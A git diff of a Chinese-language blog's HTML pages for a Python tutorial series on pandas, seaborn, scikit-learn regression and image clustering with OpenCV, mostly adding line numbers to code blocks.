                    df2 = df.sort_values('Manual', ascending=True) # ascending: 升序
                    • 选取某行/列
                    -
                    df2[['Manual', 'Auto_th_2']]
                    +
                    1
                    df2[['Manual', 'Auto_th_2']]
                    @@ -1654,7 +1652,7 @@

                    df[20: 30]
                    +
                    1
                    df[20: 30]
                    @@ -1775,7 +1773,7 @@

                    Pandas 读取某列、某行数据——loc、iloc 用法总结_子木同学的博客-CSDN 博客_pandas iloc

                    -

                    df.loc[20: 30, ['Manual', 'Auto_th_2']]
                    +
                    1
                    df.loc[20: 30, ['Manual', 'Auto_th_2']]
                    @@ -1842,7 +1840,7 @@

                    set2_df = df[df['Unnamed: 0'] == 'Set2']
                    set2_df.head()
                    +
                    1
                    2
                    set2_df = df[df['Unnamed: 0'] == 'Set2']
                    set2_df.head()
                    @@ -1912,13 +1910,13 @@

                    max(set2_df['Manual'])
                    +
                    1
                    max(set2_df['Manual'])
                    120.0
                     
                    • 根据条件选取某些值
                    -
                    df['Manual'] > 100
                    +
                    1
                    df['Manual'] > 100
                    0     False
                     1     False
                     2      True
                    @@ -1932,7 +1930,7 @@ 

                    df[df['Manual'] > 100].head()
                    +
                    1
                    df[df['Manual'] > 100].head()
                    @@ -2002,7 +2000,7 @@

                    df[(df['Manual'] > 100) & (df['Auto_th_2'] < 100)].head()
                    +
                    1
                    df[(df['Manual'] > 100) & (df['Auto_th_2'] < 100)].head()
                    @@ -2072,7 +2070,7 @@

                    for index, row in df.iterrows():
                    average_auto = (row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3
                    print(round(average_auto), row['Manual'])
                    +
                    1
                    2
                    3
                    for index, row in df.iterrows():
                    average_auto = (row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3
                    print(round(average_auto), row['Manual'])
                    80 92.0
                     76 87.0
                     89 104.0
                    @@ -2089,7 +2087,7 @@ 

                    39 - Introduction to Pandas - Grouping Data

                    -
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df = df.rename(columns = {'Unnamed: 0': 'Image_set'})
                    df.head()
                    +
                    1
                    2
                    3
                    4
                    5
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df = df.rename(columns = {'Unnamed: 0': 'Image_set'})
                    df.head()
                    @@ -2156,7 +2154,7 @@

                    df = df.drop('Manual2', axis=1)
                    df.head()
                    +
                    1
                    2
                    df = df.drop('Manual2', axis=1)
                    df.head()
                    @@ -2220,8 +2218,8 @@

                    group_by_file = df.groupby(by=['Image_set'])
                    set_data_count = group_by_file.count()
                    set_data_avg = group_by_file.mean()
                    -
                    set_data_count
                    +
                    1
                    2
                    3
                    group_by_file = df.groupby(by=['Image_set'])
                    set_data_count = group_by_file.count()
                    set_data_avg = group_by_file.mean()
                    +
                    1
                    set_data_count
                    @@ -2276,7 +2274,7 @@

                    set_data_avg
                    +
                    1
                    set_data_avg
                    @@ -2328,11 +2326,11 @@

                    df['Manual'].corr(df['Auto_th_2'])
                    +
                    1
                    df['Manual'].corr(df['Auto_th_2'])
                    0.7381233054217538
                     

                    40 - Introduction to Pandas - Dealing with missing -null- data

                    -
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df.head(8)
                    +
                    1
                    2
                    3
                    4
                    import pandas as pd

                    df = pd.read_csv('data/manual_vs_auto.csv')
                    df.head(8)
                    @@ -2432,7 +2430,7 @@

                  • 查看缺失值
                  • -

                    df.isnull()
                    +
                    1
                    df.isnull()
                    @@ -2560,7 +2558,7 @@

                    100 rows × 7 columns

                    -
                    df.isnull().sum()
                    +
                    1
                    df.isnull().sum()
                    Unnamed: 0     0
                     Image          0
                     Manual         6
                    @@ -2573,7 +2571,7 @@ 

                  • 删除缺失值
                  -
                  df = df.drop('Manual2', axis=1)
                  df2 = df.dropna()
                  df2.head(10)
                  +
                  1
                  2
                  3
                  df = df.drop('Manual2', axis=1)
                  df2 = df.dropna()
                  df2.head(10)
                  @@ -2679,7 +2677,7 @@

                  -
                  df = pd.read_csv('data/manual_vs_auto.csv')
                  df.describe()
                  +
                  1
                  2
                  df = pd.read_csv('data/manual_vs_auto.csv')
                  df.describe()
                  @@ -2761,7 +2759,7 @@

                • 填充缺失值
                • -

                  df['Manual'].fillna(100, inplace=True)
                  df.head(10)
                  +
                  1
                  2
                  df['Manual'].fillna(100, inplace=True)
                  df.head(10)
                  @@ -2881,8 +2879,8 @@

                • 使用平均值填充缺失值
                • -

                  import numpy as np

                  df = pd.read_csv('data/manual_vs_auto.csv')
                  df['Manual'] = df.apply(
                  lambda row: (round((row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_3']) / 3)) # 平均值
                  if np.isnan(row['Manual']) # 如果是缺失值的话
                  else row['Manual'], axis=1) # 填充在 Manual 列上
                  -
                  df.head(10)
                  +
                  1
                  2
                  3
                  4
                  5
                  6
                  7
                  import numpy as np

                  df = pd.read_csv('data/manual_vs_auto.csv')
                  df['Manual'] = df.apply(
                  lambda row: (round((row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_3']) / 3)) # 平均值
                  if np.isnan(row['Manual']) # 如果是缺失值的话
                  else row['Manual'], axis=1) # 填充在 Manual 列上
                  +
                  1
                  df.head(10)
                  @@ -3000,7 +2998,7 @@

                  41 - Introduction to Pandas - Plotting

                  -
                  import pandas as pd

                  df = pd.read_csv('data/manual_vs_auto.csv')
                  df = df.rename(columns={'Unnamed: 0': 'Image_set'})
                  df.head()
                  +
                  1
                  2
                  3
                  4
                  5
                  import pandas as pd

                  df = pd.read_csv('data/manual_vs_auto.csv')
                  df = df.rename(columns={'Unnamed: 0': 'Image_set'})
                  df.head()
                  @@ -3070,28 +3068,28 @@

                  df['Manual'].plot()
                  +
                  1
                  df['Manual'].plot()
                  <AxesSubplot:>
                   

                  png

                  • 绘制直方图
                  -
                  # 类型 hist,分组 30,标题 Manual Count,图像大小 12 * 10
                  df['Manual'].plot(kind='hist', bins=30, title='Manual Count', figsize=(12, 10))
                  +
                  1
                  2
                  # 类型 hist,分组 30,标题 Manual Count,图像大小 12 * 10
                  df['Manual'].plot(kind='hist', bins=30, title='Manual Count', figsize=(12, 10))
                  <AxesSubplot:title={'center':'Manual Count'}, ylabel='Frequency'>
                   

                  png

                  -
                  df['Manual'].rolling(3).mean().plot()
                  +
                  1
                  df['Manual'].rolling(3).mean().plot()
                  <AxesSubplot:>
                   

                  png

                  -
                  df['Manual'].describe()
                  +
                  1
                  df['Manual'].describe()
                  count     94.000000
                   mean     100.021277
                   std       11.285140
                  @@ -3102,22 +3100,22 @@ 

                  df['Manual'].plot(kind='box', figsize=(8, 6))
                  +
                  1
                  df['Manual'].plot(kind='box', figsize=(8, 6))
                  <AxesSubplot:>
                   

                  png

                  • 散点图
                  -
                  df.plot(kind='scatter', x='Manual', y='Auto_th_2', title='Manual vs Auto 2')
                  +
                  1
                  df.plot(kind='scatter', x='Manual', y='Auto_th_2', title='Manual vs Auto 2')
                  <AxesSubplot:title={'center':'Manual vs Auto 2'}, xlabel='Manual', ylabel='Auto_th_2'>
                   

                  png

                  -
                  def cell_count(x):
                  if x <= 100.0:
                  return 'low'
                  else:
                  return 'high'
                  -
                  df['cell_count_index'] = df['Manual'].apply(cell_count)
                  df.head()
                  +
                  1
                  2
                  3
                  4
                  5
                  def cell_count(x):
                  if x <= 100.0:
                  return 'low'
                  else:
                  return 'high'
                  +
                  1
                  2
                  df['cell_count_index'] = df['Manual'].apply(cell_count)
                  df.head()
                  @@ -3190,8 +3188,8 @@

                  df.to_csv('data/manual_vs_auto2.csv')
                  -
                  df.boxplot(column='Manual', by='cell_count_index')
                  +
                  1
                  df.to_csv('data/manual_vs_auto2.csv')
                  +
                  1
                  df.boxplot(column='Manual', by='cell_count_index')
                  <AxesSubplot:title={'center':'Manual'}, xlabel='cell_count_index'>
                   

                  png

                  @@ -3199,8 +3197,8 @@

                  Seaborn

                -
                import pandas as pd

                df = pd.read_csv('data/manual_vs_auto.csv')
                df['Manual'].fillna(100, inplace=True)
                df = df.rename(columns={'Unnamed: 0': 'Image_Set'})
                -
                import seaborn as sns

                sns.distplot(df['Manual'])
                +
                1
                2
                3
                4
                5
                import pandas as pd

                df = pd.read_csv('data/manual_vs_auto.csv')
                df['Manual'].fillna(100, inplace=True)
                df = df.rename(columns={'Unnamed: 0': 'Image_Set'})
                +
                1
                2
                3
                import seaborn as sns

                sns.distplot(df['Manual'])
                C:\Users\gzjzx\anaconda3\lib\site-packages\seaborn\distributions.py:2619: FutureWarning: `distplot` is a deprecated function and will be removed in a future version. Please adapt your code to use either `displot` (a figure-level function with similar flexibility) or `histplot` (an axes-level function for histograms).
                   warnings.warn(msg, FutureWarning)
                 
                @@ -3212,32 +3210,32 @@ 

                sns.kdeplot(df['Manual'], shade=True)
                sns.kdeplot(df['Auto_th_2'], shade=True)
                sns.kdeplot(df['Auto_th_3'], shade=True)
                sns.kdeplot(df['Auto_th_4'], shade=True)
                +
                1
                2
                3
                4
                sns.kdeplot(df['Manual'], shade=True)
                sns.kdeplot(df['Auto_th_2'], shade=True)
                sns.kdeplot(df['Auto_th_3'], shade=True)
                sns.kdeplot(df['Auto_th_4'], shade=True)
                <AxesSubplot:xlabel='Manual', ylabel='Density'>
                 

                png

                • sns.jointplot() 双变量关系图
                -
                sns.jointplot(x='Manual', y='Auto_th_2', data=df, kind='kde')
                +
                1
                sns.jointplot(x='Manual', y='Auto_th_2', data=df, kind='kde')
                <seaborn.axisgrid.JointGrid at 0x212f9ad23d0>
                 

                png

                • sns.pairplot() 用来展示两两特征之间的关系
                -
                sns.pairplot(df, x_vars=['Auto_th_2', 'Auto_th_3', 'Auto_th_4'], y_vars='Manual', height=6)
                +
                1
                sns.pairplot(df, x_vars=['Auto_th_2', 'Auto_th_3', 'Auto_th_4'], y_vars='Manual', height=6)
                <seaborn.axisgrid.PairGrid at 0x212f9bd0fd0>
                 

                png

                • sns.lmplot() 展示线性关系
                -
                sns.lmplot(x='Manual', y='Auto_th_2', data=df, order=1, hue='Image_Set')
                +
                1
                sns.lmplot(x='Manual', y='Auto_th_2', data=df, order=1, hue='Image_Set')
                <seaborn.axisgrid.FacetGrid at 0x212fa457f70>
                 

                png

                -
                from scipy import stats

                slope, intercept, r_value, p_value, std_err = stats.linregress(df['Manual'], df['Auto_th_2'])
                slope, intercept, r_value, p_value, std_err
                +
                1
                2
                3
                4
                from scipy import stats

                slope, intercept, r_value, p_value, std_err = stats.linregress(df['Manual'], df['Auto_th_2'])
                slope, intercept, r_value, p_value, std_err
                (0.772483189743971,
                  -0.8937686381919718,
                  0.7058094587729904,
                @@ -3247,14 +3245,14 @@ 

                df = pd.read_csv('data/manual_vs_auto2.csv')
                df['Manual'].fillna(100, inplace=True)
                df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

                sns.swarmplot(x='Image_Set', y='Manual', data=df, hue='cell_count_index', dodge=True)
                +
                1
                2
                3
                4
                5
                df = pd.read_csv('data/manual_vs_auto2.csv')
                df['Manual'].fillna(100, inplace=True)
                df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

                sns.swarmplot(x='Image_Set', y='Manual', data=df, hue='cell_count_index', dodge=True)
                <AxesSubplot:xlabel='Image_Set', ylabel='Manual'>
                 

                png

                • sns.heatmap() 热图
                -
                corr = df.loc[:,df.dtypes == 'int64'].corr() #Correlates all int64 columns
                sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, cmap=sns.diverging_palette(220, 10, as_cmap=True))
                +
                1
                2
                corr = df.loc[:,df.dtypes == 'int64'].corr() #Correlates all int64 columns
                sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, cmap=sns.diverging_palette(220, 10, as_cmap=True))
                <AxesSubplot:>
                 

                png

                @@ -7290,6 +7288,8 @@

                目录

                var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html b/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html index 46e79c15fe..78e8caccd1 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(43-49)-Regression/index.html @@ -44,8 +44,6 @@ - - @@ -453,7 +451,7 @@

                44 - What is linear regression

                ​ 介绍了下线性回归以及损失函数。

                45 - Linear regression using Sci-Kit Learn in Python

                -
                import pandas as pd
                import numpy as np
                import matplotlib.pyplot as plt
                from sklearn import linear_model

                df = pd.read_csv('data/cells.csv')
                df
                +
                1
                2
                3
                4
                5
                6
                7
                import pandas as pd
                import numpy as np
                import matplotlib.pyplot as plt
                from sklearn import linear_model

                df = pd.read_csv('data/cells.csv')
                df
                @@ -520,7 +518,7 @@

                plt.xlabel('time')
                plt.ylabel('cells')
                plt.scatter(df.time, df.cells, color='red', marker='+')
                +
                1
                2
                3
                plt.xlabel('time')
                plt.ylabel('cells')
                plt.scatter(df.time, df.cells, color='red', marker='+')
                <matplotlib.collections.PathCollection at 0x2c7bd4eb0d0>
                 

                png

                @@ -532,7 +530,7 @@

                x_df = df[['time']]
                x_df
                +
                1
                2
                x_df = df[['time']]
                x_df
                @@ -587,19 +585,19 @@

                x_df.dtypes
                +
                1
                x_df.dtypes
                time    float64
                 dtype: object
                 
                -
                y_df = df.cells
                +
                1
                y_df = df.cells
                • 创建并训练模型
                -
                reg = linear_model.LinearRegression()  # Create an instance of the model
                reg.fit(x_df, y_df) # Training the model (fitting a line)
                +
                1
                2
                reg = linear_model.LinearRegression()  # Create an instance of the model
                reg.fit(x_df, y_df) # Training the model (fitting a line)
                • 预测模型
                -
                # Predict
                reg.predict([[2.3]])
                +
                1
                2
                # Predict
                reg.predict([[2.3]])
                C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names
                   warnings.warn(
                 
                @@ -610,19 +608,19 @@ 

                reg.score(x_df, y_df)
                +
                1
                reg.score(x_df, y_df)
                0.9784252641866715
                 
                • Y = mx + C
                -
                c = reg.intercept_
                m = reg.coef_
                2.3 * m + c
                +
                1
                2
                3
                c = reg.intercept_
                m = reg.coef_
                2.3 * m + c
                array([257.61090909])
                 
                • 预测多个数据
                -
                cells_predict_df = pd.read_csv('data/cells_predict.csv')
                cells_predict_df.head()
                +
                1
                2
                cells_predict_df = pd.read_csv('data/cells_predict.csv')
                cells_predict_df.head()
                @@ -653,7 +651,7 @@

                predicted_cells = reg.predict(cells_predict_df)
                predicted_cells
                +
                1
                2
                predicted_cells = reg.predict(cells_predict_df)
                predicted_cells
                array([212.33090909, 214.38909091, 216.44727273, 218.50545455,
                        220.56363636, 222.62181818, 224.68      , 226.73818182,
                        228.79636364, 230.85454545, 232.91272727, 234.97090909,
                @@ -668,7 +666,7 @@ 

                cells_predict_df['cells'] = predicted_cells
                cells_predict_df.head()
                +
                1
                2
                cells_predict_df['cells'] = predicted_cells
                cells_predict_df.head()
                @@ -705,10 +703,10 @@

                cells_predict_df.to_csv('predicted_cells.csv')
                +
                1
                cells_predict_df.to_csv('predicted_cells.csv')

                46 - Splitting data into training and testing sets for machine learning

                -
                import pandas as pd
                import numpy as np
                import matplotlib.pyplot as plt
                from sklearn import linear_model
                -
                df = pd.read_csv('data/cells.csv')
                df
                +
                1
                2
                3
                4
                import pandas as pd
                import numpy as np
                import matplotlib.pyplot as plt
                from sklearn import linear_model
                +
                1
                2
                df = pd.read_csv('data/cells.csv')
                df
                @@ -775,12 +773,12 @@

                -
                x_df = df.drop('cells', axis='columns')
                y_df = df.cells
                +
                1
                2
                x_df = df.drop('cells', axis='columns')
                y_df = df.cells
                • 分割训练集(train)和测试集(test)
                -
                from sklearn.model_selection import train_test_split

                X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.4, random_state=10)
                -
                X_train
                +
                1
                2
                3
                from sklearn.model_selection import train_test_split

                X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.4, random_state=10)
                +
                1
                X_train
                @@ -815,25 +813,25 @@

                -
                reg = linear_model.LinearRegression()
                reg.fit(X_train, y_train)

                prediction_test = reg.predict(X_test)
                prediction_test
                +
                1
                2
                3
                4
                5
                reg = linear_model.LinearRegression()
                reg.fit(X_train, y_train)

                prediction_test = reg.predict(X_test)
                prediction_test
                array([229.66081871, 270.73684211, 291.2748538 , 260.46783626,
                        281.00584795])
                 
                • 计算均方误差
                -
                print('Mean sq. error between y_test and predicted =', np.mean(prediction_test - y_test) ** 2)
                +
                1
                print('Mean sq. error between y_test and predicted =', np.mean(prediction_test - y_test) ** 2)
                Mean sq. error between y_test and predicted = 7.677112273861912
                 
                • 计算残差
                -
                plt.scatter(prediction_test, prediction_test - y_test)
                plt.hlines(y=0, xmin=200, xmax=310) # 画一条水平线
                +
                1
                2
                plt.scatter(prediction_test, prediction_test - y_test)
                plt.hlines(y=0, xmin=200, xmax=310) # 画一条水平线
                <matplotlib.collections.LineCollection at 0x26a2470d640>
                 

                png

                47 - Multiple Linear Regression with SciKit-Learn in Python

                -
                import pandas as pd

                df = pd.read_excel('data/images_analyzed.xlsx')
                df.head()
                +
                1
                2
                3
                4
                import pandas as pd

                df = pd.read_excel('data/images_analyzed.xlsx')
                df.head()
                @@ -888,14 +886,14 @@

                import seaborn as sns

                sns.lmplot(x='Time', y='Images_Analyzed', data=df, hue='Age')
                +
                1
                2
                3
                import seaborn as sns

                sns.lmplot(x='Time', y='Images_Analyzed', data=df, hue='Age')
                <seaborn.axisgrid.FacetGrid at 0x238adc47910>
                 

                png

                -
                import numpy as np
                from sklearn import linear_model

                reg = linear_model.LinearRegression()
                reg.fit(df[['Time', 'Coffee', 'Age']], df.Images_Analyzed)

                reg.coef_, reg.intercept_
                +
                1
                2
                3
                4
                5
                6
                7
                import numpy as np
                from sklearn import linear_model

                reg = linear_model.LinearRegression()
                reg.fit(df[['Time', 'Coffee', 'Age']], df.Images_Analyzed)

                reg.coef_, reg.intercept_
                (array([-0.35642282, -0.3475    , -0.04279945]), 25.189636192124166)
                 
                -
                reg.predict([[13, 2, 23]])
                +
                1
                reg.predict([[13, 2, 23]])
                C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names
                   warnings.warn(
                 
                @@ -910,7 +908,7 @@ 

              • STEP1: DATA READING AND UNDERSTANDING
              -
              import pandas as pd
              from matplotlib import pyplot as plt

              df = pd.read_csv('data/images_analyzed_productivity1.csv')
              df.head()
              +
              1
              2
              3
              4
              5
              import pandas as pd
              from matplotlib import pyplot as plt

              df = pd.read_csv('data/images_analyzed_productivity1.csv')
              df.head()
              @@ -971,11 +969,11 @@

              -
              plt.scatter(df.Time, df.Productivity, marker='+', color='red')
              +
              1
              plt.scatter(df.Time, df.Productivity, marker='+', color='red')
              <matplotlib.collections.PathCollection at 0x206c9140bb0>
               

              png

              -
              sizes = df['Productivity'].value_counts(sort=1)
              plt.pie(sizes, autopct='%1.1f%%')
              +
              1
              2
              sizes = df['Productivity'].value_counts(sort=1)
              plt.pie(sizes, autopct='%1.1f%%')
              ([<matplotlib.patches.Wedge at 0x206cc3afb80>,
                 <matplotlib.patches.Wedge at 0x206cc3b9310>],
                [Text(-0.08630492316306847, 1.096609073570804, ''),
              @@ -987,7 +985,7 @@ 

            • STEP2: DROP IRRLEVANT DATA 丢弃无关数据
            -
            df.drop(['Images_Analyzed'], axis=1, inplace=True)
            df.drop(['User'], axis=1, inplace=True)
            df.head()
            +
            1
            2
            3
            df.drop(['Images_Analyzed'], axis=1, inplace=True)
            df.drop(['User'], axis=1, inplace=True)
            df.head()
            @@ -1039,12 +1037,12 @@

          • STEP3: DEAL WITH MISSING VALUES 处理缺失数据
          • -

            df = df.dropna()
            +
            1
            df = df.dropna()
            • STEP4: CONVERT NON-NUMERIC TO NUMERIC

            将 Good 和 Bad 替换成计算机便于理解的数字类型

            -
            df.Productivity[df.Productivity == 'Good'] = 1
            df.Productivity[df.Productivity == 'Bad'] = 2
            df.head()
            +
            1
            2
            3
            df.Productivity[df.Productivity == 'Good'] = 1
            df.Productivity[df.Productivity == 'Bad'] = 2
            df.head()
            @@ -1096,13 +1094,13 @@

          • STEP 5: PREPARE THE DATA(define indep/dep variables)
          • -

            Y = df['Productivity'].values
            Y = Y.astype('int')
            Y
            +
            1
            2
            3
            Y = df['Productivity'].values
            Y = Y.astype('int')
            Y
            array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,
                    1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,
                    1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,
                    1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
             
            -
            X = df.drop(labels=['Productivity'], axis=1)
            X.head()
            +
            1
            2
            X = df.drop(labels=['Productivity'], axis=1)
            X.head()
            @@ -1148,7 +1146,7 @@

          • STEP 6: SPLIT DATA
          • -

            from sklearn.model_selection import train_test_split

            X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=20)
            X_train.head()
            +
            1
            2
            3
            4
            from sklearn.model_selection import train_test_split

            X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=20)
            X_train.head()
            @@ -1194,26 +1192,26 @@

          • STEP 7: DEFINE THE MODEL
          • -

            from sklearn.linear_model import LogisticRegression

            model = LogisticRegression()
            model.fit(X_train, y_train)
            +
            1
            2
            3
            4
            from sklearn.linear_model import LogisticRegression

            model = LogisticRegression()
            model.fit(X_train, y_train)
            • STEP 8: TESTING THE MODEL
            -
            prediction_test = model.predict(X_test)
            prediction_test
            +
            1
            2
            prediction_test = model.predict(X_test)
            prediction_test
            array([2, 2, 2, 1, 1, 2, 1, 2])
             
            • STEP 9: VERIFY THE ACCURACY 验证准确性
            -
            from sklearn import metrics

            print('Accuracy =', metrics.accuracy_score(y_test, prediction_test))
            +
            1
            2
            3
            from sklearn import metrics

            print('Accuracy =', metrics.accuracy_score(y_test, prediction_test))
            Accuracy = 0.75
             
            • STEP 10: WEIGHTS
            -
            model.coef_
            +
            1
            model.coef_
            array([[0.18788991, 0.19204588, 0.0200644 ]])
             
            -
            weights = pd.Series(model.coef_[0], index=X.columns.values)
            weights
            +
            1
            2
            weights = pd.Series(model.coef_[0], index=X.columns.values)
            weights
            Time      0.187890
             Coffee    0.192046
             Age       0.020064
            @@ -5251,6 +5249,8 @@ 

            目录

            var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html b/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html index cdf74ae3a3..0280257257 100644 --- a/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html +++ b/posts/DIP-Python tutorials for image processing and machine learning(50-54)-Unsupervised Learning/index.html @@ -44,8 +44,6 @@ - - @@ -403,7 +401,7 @@

            DIP-Python tutorials for image processing and machine learning(50-54)-Unsupe

          -
          import numpy as np
          import matplotlib.pyplot as plt
          import cv2

          img = cv2.imread('images/BSE_Image.jpg')
          plt.imshow(img)
          +
          1
          2
          3
          4
          5
          6
          import numpy as np
          import matplotlib.pyplot as plt
          import cv2

          img = cv2.imread('images/BSE_Image.jpg')
          plt.imshow(img)
          <matplotlib.image.AxesImage at 0x202a78459d0>
           

          png

          • 将图像变成一维的
          -
          img2 = img.reshape((-1, 3))
          img2 = np.float32(img2)
          +
          1
          2
          img2 = img.reshape((-1, 3))
          img2 = np.float32(img2)
          • Now we apply the KMeans function. Before that we need to specify the criteria. My criteria is such that, whenever 10 iterations of algorithm is ran, or an accuracy of epsilon = 1.0 is reached, stop the algorithm and return the answer.

            @@ -518,7 +516,7 @@

            criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
            +
            1
            criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
            • Clusters

              @@ -554,11 +552,11 @@

              k = 3
              attempts = 10
              ret, label, center = cv2.kmeans(img2, k, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)
              center = np.uint8(center)
              res = center[label.flatten()]
              +
              1
              2
              3
              4
              5
              k = 3
              attempts = 10
              ret, label, center = cv2.kmeans(img2, k, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)
              center = np.uint8(center)
              res = center[label.flatten()]
              • 将数组重新转成原来的形状
              -
              res2 = res.reshape((img.shape))
              +
              1
              res2 = res.reshape((img.shape))
              -
              import numpy as np
              import cv2

              img = cv2.imread('images/plant_cells.jpg')
              img2 = img.reshape((-1, 3))
              -
              from sklearn.mixture import GaussianMixture as GMM

              gmm_model = GMM(n_components=2, covariance_type='tied').fit(img2)
              gmm_labels = gmm_model.predict(img2)
              original_shape = img.shape
              segmented = gmm_labels.reshape(original_shape[0], original_shape[1])
              +
              1
              2
              3
              4
              5
              import numpy as np
              import cv2

              img = cv2.imread('images/plant_cells.jpg')
              img2 = img.reshape((-1, 3))
              +
              1
              2
              3
              4
              5
              6
              from sklearn.mixture import GaussianMixture as GMM

              gmm_model = GMM(n_components=2, covariance_type='tied').fit(img2)
              gmm_labels = gmm_model.predict(img2)
              original_shape = img.shape
              segmented = gmm_labels.reshape(original_shape[0], original_shape[1])
              • 图像被分成 0 和 1 两类
              -
              import matplotlib.pyplot as plt

              plt.imshow(segmented, cmap='gray')
              +
              1
              2
              3
              import matplotlib.pyplot as plt

              plt.imshow(segmented, cmap='gray')
              <matplotlib.image.AxesImage at 0x1ee043bb4c0>
               

              png


              -
              import numpy as np
              import cv2

              img = cv2.imread('images/BSE_Image.jpg')
              img2 = img.reshape((-1, 3))

              from sklearn.mixture import GaussianMixture as GMM

              # 分成 4 类
              gmm_model = GMM(n_components=4, covariance_type='tied').fit(img2)
              gmm_labels = gmm_model.predict(img2)
              original_shape = img.shape
              segmented = gmm_labels.reshape(original_shape[0], original_shape[1])

              import matplotlib.pyplot as plt

              plt.imshow(segmented, cmap='gray')
              +
              1
              2
              3
              4
              5
              6
              7
              8
              9
              10
              11
              12
              13
              14
              15
              16
              17
              import numpy as np
              import cv2

              img = cv2.imread('images/BSE_Image.jpg')
              img2 = img.reshape((-1, 3))

              from sklearn.mixture import GaussianMixture as GMM

              # 分成 4 类
              gmm_model = GMM(n_components=4, covariance_type='tied').fit(img2)
              gmm_labels = gmm_model.predict(img2)
              original_shape = img.shape
              segmented = gmm_labels.reshape(original_shape[0], original_shape[1])

              import matplotlib.pyplot as plt

              plt.imshow(segmented, cmap='gray')
              <matplotlib.image.AxesImage at 0x1ee04598c10>
               

              png

              @@ -647,7 +645,7 @@

              from sklearn import mixture
              import matplotlib.pyplot as plt
              import numpy as np
              import scipy.stats as stats
              +
              1
              2
              3
              4
              from sklearn import mixture
              import matplotlib.pyplot as plt
              import numpy as np
              import scipy.stats as stats
              • Create some data

                @@ -662,13 +660,13 @@

                # 均值为 5 方差为 5 的 1000 个数据 和 均值为 10 方差为 2 的 1000 个数据
                # 合并起来就是 2000 个数据
                x = np.concatenate((np.random.normal(5, 5, 1000), np.random.normal(10, 2, 1000)))
                plt.plot(x)
                +
                1
                2
                3
                4
                # 均值为 5 方差为 5 的 1000 个数据 和 均值为 10 方差为 2 的 1000 个数据
                # 合并起来就是 2000 个数据
                x = np.concatenate((np.random.normal(5, 5, 1000), np.random.normal(10, 2, 1000)))
                plt.plot(x)
                [<matplotlib.lines.Line2D at 0x1fc9d0cd7c0>]
                 

                png

                -
                plt.hist(x, bins=100)
                +
                1
                plt.hist(x, bins=100)

                png

                -
                f = x.reshape(-1, 1)
                +
                1
                f = x.reshape(-1, 1)
                • We created data from two normal distributions but for the fun of it let us decompose our data into 3 Gaussians. n_components=3
                    @@ -676,26 +674,26 @@

                    g = mixture.GaussianMixture(n_components=3,covariance_type='full')
                    g.fit(f)
                    weights = g.weights_ # 权重
                    means = g.means_ # 均值
                    covars = g.covariances_ # 协方差
                    -
                    x_axis = x
                    x_axis.sort()

                    plt.hist(f, bins=100, histtype='bar', density=True, ec='red', alpha=0.5)
                    plt.plot(x_axis,weights[0]*stats.norm.pdf(x_axis,means[0],np.sqrt(covars[0])).ravel(), c='red')
                    plt.plot(x_axis,weights[1]*stats.norm.pdf(x_axis,means[1],np.sqrt(covars[1])).ravel(), c='green')
                    plt.plot(x_axis,weights[2]*stats.norm.pdf(x_axis,means[2],np.sqrt(covars[2])).ravel(), c='blue')

                    plt.grid()
                    plt.show()
                    +
                    1
                    2
                    3
                    4
                    5
                    g = mixture.GaussianMixture(n_components=3,covariance_type='full')
                    g.fit(f)
                    weights = g.weights_ # 权重
                    means = g.means_ # 均值
                    covars = g.covariances_ # 协方差
                    +
                    1
                    2
                    3
                    4
                    5
                    6
                    7
                    8
                    9
                    10
                    x_axis = x
                    x_axis.sort()

                    plt.hist(f, bins=100, histtype='bar', density=True, ec='red', alpha=0.5)
                    plt.plot(x_axis,weights[0]*stats.norm.pdf(x_axis,means[0],np.sqrt(covars[0])).ravel(), c='red')
                    plt.plot(x_axis,weights[1]*stats.norm.pdf(x_axis,means[1],np.sqrt(covars[1])).ravel(), c='green')
                    plt.plot(x_axis,weights[2]*stats.norm.pdf(x_axis,means[2],np.sqrt(covars[2])).ravel(), c='blue')

                    plt.grid()
                    plt.show()

                    png


                    2D example

                    -
                    from sklearn.datasets import make_blobs
                    import numpy as np
                    from matplotlib import pyplot as plt
                    +
